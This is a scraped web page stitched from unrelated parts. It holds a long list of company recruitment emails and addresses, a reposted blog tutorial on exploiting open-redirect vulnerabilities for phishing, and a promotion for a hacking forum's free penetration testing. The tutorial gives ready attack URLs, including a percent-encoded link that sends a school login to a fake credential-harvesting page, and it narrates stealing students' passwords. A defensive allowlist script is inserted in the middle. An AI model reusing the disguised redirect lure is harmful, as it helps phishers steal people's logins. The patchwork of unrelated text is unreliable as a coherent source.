ecomjobs@cybertech.com FormulaSys resumes@FormulaSys.com US WorkFlow hr@workflow.com SystemLogic got2b@SystemLogic.com CyberAnalysts resume@cyberanalysts.com IMPETUS hr@impetus.co.in INDORE VISTEON svadivel@VISTEON.com EMBEDDED Amadee myjobs@amadee.de INTERNET WEBTEK webtek_jobs@dresdner-bank.com CIRRUS LOGIC hrd@cirrus.stpp.soft.net TCS Chennai resume@chennai.tcs.com TVSFUGEN mjojo@tvsfugen.com Onscan -Wireless – jobs@onscan.com EmbeddedWireless jobs@EmbeddedWireless.com DECCANET career@deccanetdesigns.com DuskValley joinus@DuskValley.com duskvalley@vsnl.com SEMA hrd@sema.co.in CALCUTTA TElecom FTD future4u@ftdpl.com.sg DSP / Telecom SAS careers@sasi.com SPIKE design@spikeindia.soft.net EDA / ASIC HCL freedom@ggn.hcltech.com Aptech corporatetrg@aptech.co.in Datamatics psaib@datamatics.com BOMBAY AQUILA hrd@aquila.soft.net Graphics , EBusiness DATUM careers@datumtec.com HUGHES resumetoib@hss.hns.com AMBER india_jobs@ambernetworks.com Networking Integra career@integramicro.com Lante cvindia@lante.com DELHI -Ecom RELQ RELQusa@RELQ.com Sonata-US hrd@sonata-software.com career@sonata-software.com ZAP hrdbg@skillsandjobs.com Zensar dreamcareers@zensar.com Spectrum , Singapore ravikum@mbox2.singnet.com.sg Forbes, UK forbeshr@bgl.vsnl.net.in forbesbg@bgl.vsnl.net.in Synopsys guru@synopsys.com JobCurry Australia map@jobcurry.com Sun Tech US hr@suntechnologies.com HCL Tech – careers@noida.hclt.com Noida Infosys – engserv@inf.com HTC – htc.blr@htcinc.com CGSmith – resume@cgs.cgsmith.soft.net APCC – irecruit@apcc.com TechDrive sunitha@techdriveintl.com UniqueComputing careers@uniquecomputing.com US Accord Soft asiapacific@accord-soft.com ZenSoft hrd.zensoft@pacific.net.sg Singapore Zenith hr@zenithsoft.com Mumbai Velocient rsg@in.velocient.com Delhi , US Selectica hr_bgl@selectica.com Think Inc. 
jobs@thinkbn.com Coimbatore – Mphasis hr@mphasis.com Digital di.recruit@digital.com Alopa hrindia@alopa.com Silicon Automation Systems careers@sasi.com Birla Software recruitment@birlasoftware.com WebXL jobs@webxl.com Talisma got2b@talisma.com Aditi got2b@aditi.com want2b@aditi.com AmSoft hrd@amsoftis.com Bangalore Software jobs@bangaloresoftware.com ARTHUR ANDERSEN rescw@arthurandersen.com Raffles careers@raffles.soft.net ECosmos hr_ecosmos@netkracker.com SAP sanjukta.sarkar@sap.com PUNDITS protocol@pundits.com AZTEC jobs@aztecsoft.com Infy Banking Software banking_hrd@infy.com Infy IS Software careers.IS@inf.com HPS Global opportunities@hpsblr.soft.net CSS jobs@csshome.net CBSI recruiting@cbsinc.com NetGalactic hr@netgalactic.com Orbit-e livefree@orbit-e.com is3c hr@is3c.com Tenet jobs@tenetindia.com GMR Info opportunities@gmrinfo.com Intergraph resume_india@intergraph.com Net-Kraft be@net-kraft.com Honeywell career@hiso.honeywell.com TEIL hrssg@teil.soft.net CMG careers@cmg.nu CMC hrd@blr.cmc.net.in ComInsights general@cominsights.com MultiTech – resume@multitech.co.in COMPANY WEBSITES AND HR ADDRESSES Address: IBM India Golden Towers Airport Road Bangalore-560 017 Phone : 160-0443333 Email: [ direct | at | in.ibm.com ] Website: www.ibm.co.in Current vacancies: WIPRO: Address: Corporate Office Wipro Technologies Doddakannelli Sarjapur Road Bangalore - 560 035 Phone: +91 (80) 28440011 E-mail: [ info | at | wipro.com ] Website: www.Wipro.com Resumes: [ manager.career | at | wipro.com ] HR: [ head.recruitment | at | wipro.com ] Current vacancies: http://careers.wipro.com INFOSYS Address: No.138, Old Mahabalipuram Road, Sholinganallur, Chennai 600 119. 
Phone: (044) 24509530/40 Website: www.infosys.com Resumes: [ careers | at | infy.com ] HR: [ hravichandar | at | infosys.com ] Current vacancies: http://www.infosys.com/careers/ TCS: Address: Air India Building, 11th Floor, Nariman Point, Mumbai 400 021 Phone: +91-22-56689999 Email: [ tcs_corpoffice | at | mumbai.tcs.co.in ] Werbsite: www.tcs.com Resume: [ careers.hrd | at | tcs.com ] Current vacancies: http://www.tcs.com/0_careers/hotjobs_india/index.htm HCL Address: HCL Technologies Ltd. A-10/11, Sector 3 Noida- 201 301, UP,India Website: www.hcltech.com Phone: +91-120-252-0917/37 Current vacancies: http://www.hcltech.com/careers-default.asp HEXAWARE Address: Hexaware Technologies, Hexaware Towers, 51/3, G.N Chetty Road, T.Nagar, Chennai - 600 017 Phone: 91-44-52001600 E-mail: [ info | at | hexaware.co.in ] WebsIte: www.hexaware.com Resumes: http://www.hexaware.com/presume.htm HR: [ recruit | at | hexaware.com ] Current vacancies: http://www.hexaware.com/careerhome.htm Infodesk Manipal Ltd Specialisation: GIS Application Software, GIS Services, Web ensbled Applications, Engineering Services Website: www.infodeskmanipal.com Email: pratap@infodeskmanipal.com Location: Bangalore iSeva Systems Pvt Ltd Specialisation: CRM Consulting, Outsourcing of customer service Website: www.iseva.com Email: vaibhav@india.iseva.com Location: Bangalore IonIdea Interactive Private Limited Specialisation: Internet Middleware and Intranet Migration, Web Content Development, Datawarehousing & Data Mining, Transaction Automation & E-commerce Website: www.ionideainteractive.com Email: casper@cgipl.com Location: Bangalore i-flex Solutions Limited Specialisation: Software products & Services for the Banking & Finance Industry Website: www.iflexsolutions.com Email: r.ravisankar@citicorp.com Location: Bangalore IBM Global Services India Private Limited Specialisation: E-commerce Solutions, ERP Implementation services, Software development and maintenance, Business Intelligence Solutions 
Website: www.ibm.com Location: Bangalore IMRGlobal Ltd. Specialisation: Banking, Insurance, Financial Sectors, Manufacturing, Retail, Consumer goods, System, Integration Telecommunication, E-commerce Website: www.imrglobal.com Email: santosh@bangalore.imrglobal.com Location: Bangalore Infiniti Infotech India Pvt. Ltd. Specialisation: End-to-end internet solutions, including web sites, intranet,extranet, E-commerce and web enabled supply chain solutions based on XML technology. Website: www.i-three.com Email: svasu@i-three.com Location: Bangalore Infosys Technologies Limited Specialisation: Web Technologies / Internet / Intranet, Telecom Solutions / Communications Software, Business Process consultancy / Re-engineering, Software Maintenance and Migration Website: www.itlinfosys.com Email: infosys@inf.com Location: Bangalore Intel Asia Electronics, Inc. Specialisation: Chip Design, Microprocessor, ASIC, Telecom Solutions, Communication Software, E- commerce, EDI, Web Technologies, Internet , Intranet Website: www.intel.com Location: Bangalore ITTI Limited Specialisation: ERP Services, Business Intelligence, Help Desk Operations, Web-enabled applications Website: www.tttp.com Email: itti.blr@itti.co.in Location: Bangalore IT Solutions (India) Pvt. Ltd. Specialisation: Development of Application in Client Server, Web, Internet, E-commerce, Porting, Migration & Maintenance of application in Unix/NT, Platform, Specialisation in Data Warehousing, E-Commerce, Implementation, Support for ERP Application Website: www.itsindia.com Email: anands_at_home@yahoo.com Location: Bangalore Ivega Corporation Specialisation: IBM AS/400 and RS 6000, Development and re-engineering, client-server technologies, Internet technologies, E-Biz technologies, Product development, IT consultancy, Professional services Website: www.otpl.com Email: gdevanur@ivega.com Location: Bangalore Information Technology Park Ltd. 
Specialisation: Establish and Maintain Information Technology Park Website: www.intltechpark.com Location: Bangalore ILI Technologies (P) Ltd Specialisation: Biometrics solutions, RFID Solutions, Authentication Solutions, ASPs Website: www.ilitec.com Email: ckishan_chowbene@ilitec.com Location: Bangalore Integra Micro Systems (P) Ltd Specialisation: Telecom Billing, Customer Care, CRM, MIS, Embedded Software, Testing & Verification, Life Cycle Maintenance, Device Drivers Website: www.integramicro.com Email: info@integramicro.com Location: Bangalore iCelerate Technologies Private Limited Specialisation: Win 95, Win 98, Win NT, C, C++, Web technologies / Database management, Device Drivers / Colour Management / Biometrics, Card personalization including abase management, Device Drivers / Colour Management / Biometrics, Card personalization Website: www.imergent.net Email: pnv@datacard.com Location: Bangalore iCOPE Technologies Private Limited Specialisation: Technology Domains: Telecommunication, Telematics, Messaging, Internet Areas Of Application Development: Groupware, Unified Messaging, CTI, Mobile Internet, Security, e-Banking, e-CRM/SCM Website: www.icope.com Email: icope@icope.com Location: Bangalore IonIdea Enterprise Solutions Pvt Ltd Specialisation: Interactive Media Domain, Enterprise Applications & Products, Telecom & Communications S/W, Financial Service Industry Website: www.ionideasolutions.com Email: mohan.kumar@ionidea.com Location: Bangalore Kals Information Systems Ltd Specialisation: Consulting & Implementation of Insurance, Consulting design & development of workflow, Groupware & development management Solutions, Design & Development of Web enabled application software & e-commerce system, redesign & web enablinglegacy application Website: www.kalsinfo.com Email: srini@kalsinfo.com Location: Bangalore Khodayss Systems Limited Specialisation: Internet and E-Commerce, Hardware Products Development, IT Enabled Services Website: www.khodayss.com 
Email: sanjaydugar@khodayss.co.in Location: Bangalore Kirloskar Computer Services Ltd. Specialisation: Distribution, Manufacturing, Internet & Intranet, Engineering Website: www.kcsl.com Email: ashim@kcsl.com Location: Bangalore KMG Infotech Pvt Ltd Specialisation: IT consultancy & software development, Insurance solution, SCM solution, Web enabling of legacy & E-commerce Website: www.kmgus.com Email: shailly.Arora@kmgus.com Location: Bangalore LEC India Software Centre Ltd. Specialisation: Object Technology, Client Server, ERP/MRP Solutions, RDBMS/Dataware Housing Website: www.lecindia.com Email: lecindia@lec.dk Location: Bangalore LG Soft India Private Limited Specialisation: Emerging Technologies, E-Commerce, Enterprise systems, Embedded Systems, Systems Integration / Systems management Website: www.lg-soft.com Email: lgsi@stpb.soft.net/ritesh@lgsi.co.in Location: Bangalore Linc Software Services Pvt. Ltd. Specialisation: AS/400 - based software development and services, ERP Solution Providers, Restructuring Services (Year 2000 and Euro), Product Marketing Website: www.lincsoftware.com Email: lincindia@lincsoftware.soft.net Location: Bangalore Lucent Technologies India (P) Ltd. 
Specialisation: Software R & D for Wireless Networks Website: www.lucent.com Email: sharadsharma@lucent.com Location: Bangalore Login Infotech Private Limited Specialisation: Consulting, Training, Systems Integration, Internet and E- Commerce Email: login@vsnl.com Location: Bangalore Leo Infotech (P) Ltd. Specialisation: e-com Solutions,Software Solutions Websites & Web hosting, GIS - Remote sensig (linked with ISRO ) Website: www.leoinfo.com Email: leoinfo@vsnl.com Location: Bangalore Logica Private Limited Specialisation: Financial Products and solutions, Telecommunications, Energy & Utilities, System Integration, Consultancy Website: www.logica.com Email: Info-in@Logica.com Location: Bangalore Majoris Systems Pvt Ltd Specialisation: Turnkey software development services, IT Enabled Services, Internet, E-Commerce, Quality consulting Website: www.majoris.com Email: venkatesh.bv@majoris.com Location: Bangalore Manjushree Infotech (IT - Divi. Of Manjushree Plantation) Specialisation: On Site / Off Shore Services, Consultancy & Projects, Internet and E- Commerce Website: www.manjushreeinfotech.com Email: info@manjushreeinfotech.com Location: Bangalore Microland Ltd. Specialisation: E-commerce application, Enterprise Web Services application, Intranets, Networking & embedded systems, System Integration & Platform migration Website: www.microlandsw.com Email: bekayj@microland.co.in Location: Bangalore Mascot Systems Pvt. Ltd. Specialisation: Enterprise-wide development, reengineering and maintenance of application software in the areas of E-business, business intelligence, ERP and mobile commerce across mainframe, midrange, client server and Internet platforms Website: www.mascotsystems.com Email: sshekar@mascotsystems.com Location: Bangalore Mindtree Consulting Pvt Ltd Specialisation: Electronic Commerce, Internet Appliances, Telecom Technology Website: www.mindtree.com Email: subroto@mindtree.com Location: Bangalore Motorola India Electronics Private Ltd. 
Specialisation: Network Management, Communication Protocols, Digital Signal Processing, Systems Engineering Email: sammy_sana@miel.mot.com Location: Bangalore Medicom Solutions (P) Ltd Specialisation: Hospital Information Systems, Clinical Workstation, Clinical Information Systems Website: www.medicomsoft.com Email: bangalore@medicomsoft.com Location: Bangalore Mindteck (India) Ltd Specialisation: Internet applications, Embedded solutions Website: www.mindteck.com Email: vijay@mindteck.com Location: Bangalore Tally Solutions Pvt Ltd Specialisation: Business management software, technology R&D, products creation Website: www.tallysolutions.com Email: bharat@tallysolutions.com Location: Bangalore Travelanza.com Pvt. Ltd. Specialisation: Online travel booking Website: www.travelanza.com Email: mail@travelanza.com Location: Bangalore Tata Elxsi (India) Limited Specialisation: Visual Computing - Modeling, Medical Imaging, Simulation, Networking, Communications, Internet, Intranet, Groupware, Systems Development (DSP, VLSI, VHDL, Audio / Video Codecs, Storage Management), Design & Engineering Services - CAD / CAM / CAE Website: www.tataelxsi.com Email: dev@elxsi.ernet.in Location: Bangalore Tektronix Engineering Development (India) Ltd. 
Specialisation: Micro Processor Support for Logic analysers, Internet Printing, System Software, Film Editors Website: www.tek.com Location: Bangalore Texas Instruments India Limited Specialisation: Integrated Circuit and Software Design Website: www.ti.com/india Email: s_rajam@ti.com Location: Bangalore Chennai Companies & Consultants Indchem Software Technologies limited Specialisation: Communications and Networking, Process Control and Industrial Automation, Real Time Audio and Video, Banking and Insurance Website: www.sanmargroup.com Email: sp@sanmargroup.com Location: Chennai India Software Group-ISG Specialisation: Enterprise Wide Solutions- ERP Implementation - SAP & Oracle and Productivity Improvement Tools - Plexus & Lotus, Datawarehousing & Mining - SAS Tools, Custom Development of Off-Shore and On-site Services, Human Resource Management System Product Develop Email: indsoft@vsnl.com Location: Chennai Intelligent Systems India Pvt. Ltd. Specialisation: Software Development, System Integration, Software Migration, Product Development and Maintenance Email: isi@md2.vsnl.net.in Location: Chennai Insoft.com Pvt Ltd Specialisation: Formulate, design,develop, market, franchise, export, sell & licence software Website: www.insoft.com Email: admin@insoft.com Location: Chennai Kumaran Systems (P) Ltd. Specialisation: Migration (Anywhere to Oracle, Anywhere To Microsoft), Systems Management, Internet Services Website: www.kumaran.com Email: mohans-office@kumaran.com Location: Chennai Laser Soft Infosystems Ltd. 
Specialisation: Banking, Trade Finance, Healthcare, E-commerce Website: www.lsisl.com Email: lsi@vsnl.com Location: Chennai Lateral Software Technology Pvt Ltd Specialisation: Education Training on Linux, Open Sources & Linux, software Development, e-business Enabled Website: www.lateralsoftware.com Email: lateral@md4.vsnl.net.in Location: Chennai Landmark Infotech Systems & Solutions Pvt Ltd Specialisation: Applied IT Training, Biometric Software solutions, Retail/Suply chain solutions, Logistics Website: www.landmarkinfotech.com Location: Chennai Lister Technologies Private Ltd Specialisation: Wireless & Mobile solutions, E-solutions implementation, SMART card solutions, wireless consultancy Website: www.listertechnologies.com Email: murali@listremail.com Location: Chennai

Exploiting Redirect Vulnerabilities

I was surfing through my friend’s forum Secworm.net and read this thread about Redirection Vulnerabilities. So I thought of sharing it with you guys.


Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.


So first things first. What is a redirect vulnerability? A redirect vulnerability exists when a webpage uses a script to redirect you somewhere (usually another page on the same website), but the script is written in such a way that a hacker can manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to a webpage that has this url:




Code:

http://www.example.com/login.php?dest=members/index.html



Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.php script to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know about redirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how the script responds. For instance:




Code:

http://www.example.com/login.php?dest=http://www.google.com



If this page has a redirect vulnerability, then it should send us to google after we log in. If not, it will generate some sort of error condition and take us to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know the page is vulnerable.


Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url




Code:

www.sys.myschool.com/login.php?service=



where the service parameter points to the address of the service being accessed, as demonstrated in the following urls:




Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php

or


http://www.portal.myschool.com/login.php?service=sys/courseInfo.php




Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not a phishing page. A hacker is aware of this and realizes that this advice will give you and the other students a false sense of security when you’re on pages that are actual school pages, so he sets out looking for a way to get students to access his phishing page from within the school login system itself. He sees the above urls, recognizes their potential to be vulnerable to redirect exploitation, and creates a phishing page that looks exactly like the page your school displays when your login fails. Being a phishing page, it sends him the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then get redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:




Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php



However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexadecimal (percent-encoded) representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:




Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%65%50%61%67%65%2e%70%68%70



This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.
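
The check a security-conscious login.php author would apply (redirect only to approved destinations) and a way to spot the percent-encoded link above in mail or proxy logs, as an added Python example that is not part of the original article. The allowlist contents, the default page, the function names and the sample links are assumptions made for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist: the only post-login destinations login.php should accept.
APPROVED = {"members/index.html", "sys/mail.php", "sys/courseInfo.php"}
DEFAULT = "members/index.html"
REDIRECT_PARAMS = ("dest", "service")  # parameter names used in the article


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%2568 -> %68 -> h), a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(dest):
    """Return 'approved', 'local' (same site but not listed) or 'external'."""
    dest = fully_decode(dest).strip().replace("\\", "/")  # browsers read "\" as "/"
    if dest in APPROVED:
        return "approved"
    try:
        parts = urlsplit(dest)
    except ValueError:  # malformed host such as "http://[x"
        return "external"
    # A scheme (http:, javascript:), a host (//badsite.com) or control
    # characters mean the browser could be sent off the site.
    if (parts.scheme or parts.netloc or dest.startswith("//")
            or any(ord(c) < 0x20 for c in dest)):
        return "external"
    return "local"


def safe_destination(dest):
    """What the login script should redirect to: a listed path or the default."""
    return dest if dest in APPROVED else DEFAULT


def audit(urls):
    """Return (url, decoded destination) for links whose redirect leaves the site."""
    flagged = []
    for url in urls:
        query = parse_qs(urlsplit(url).query)  # parse_qs percent-decodes once
        for name in REDIRECT_PARAMS:
            for value in query.get(name, []):
                if classify(value) == "external":
                    flagged.append((url, fully_decode(value)))
    return flagged


# Constructed sample links, modelled on the urls in the article.
SAMPLE_LINKS = [
    "http://www.portal.myschool.com/login.php?service=sys/mail.php",
    "http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php",
    "http://www.portal.myschool.com/login.php?service="
    "%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d"
    "%2f%66%61%6b%65%50%61%67%65%2e%70%68%70",
    "http://www.portal.myschool.com/login.php?service=%2f%2fbadsite.com",
]

if __name__ == "__main__":
    print(*audit(SAMPLE_LINKS), sep="\n")
```

The server-side fix is `safe_destination`: anything not on the list, however it is encoded, falls back to the default page. `audit` is only for reviewing links that have already been sent around.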


Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.


Via. www.Secworm.net

Get Your Website Secured – Free Penetration Service

The question on every webmaster’s mind is “How secure is my website?”. Every webmaster is very keen on their website’s security because they do not want any of the data on it to be compromised. I have seen many websites getting hacked every now and then. Not only does users’ personal information get compromised, but the reputation of the site also goes down to zero! There are some professional ethical hackers who provide penetration testing services for websites, but it costs $500 and above to get any website tested, which not everyone can afford.


I found this interesting offer while surfing through SecWorm.net. SecWorm is HackingArticle’s affiliate. It’s a forum about hardcore security and ethical hacking. The SecWorm staff are very experienced in the security field. I have seen them testing many websites and applications and helping people to secure their stuff.


I noticed they have started this service called “FREE PENETRATION AND BETA TESTING FOR ANY TYPE OF WEBSITE!”, and I was like WHOA!, it is really a good way to help webmasters. One of the staff members of Secworm is my good friend. I asked him why they would provide such an expensive service for free. His answer impressed me; the only thing he said was “SecWorm’s slogan is Human Knowledge is for the world, Support Open Source and that’s exactly what we are doing.” It made sense to me.


I trust the SecWorm people because they have helped me fix a few security issues with HackingArticles. So if any of you want to get your website checked, you can visit www.SecWorm.net.


READ THIS TO GET DETAILED INFORMATION.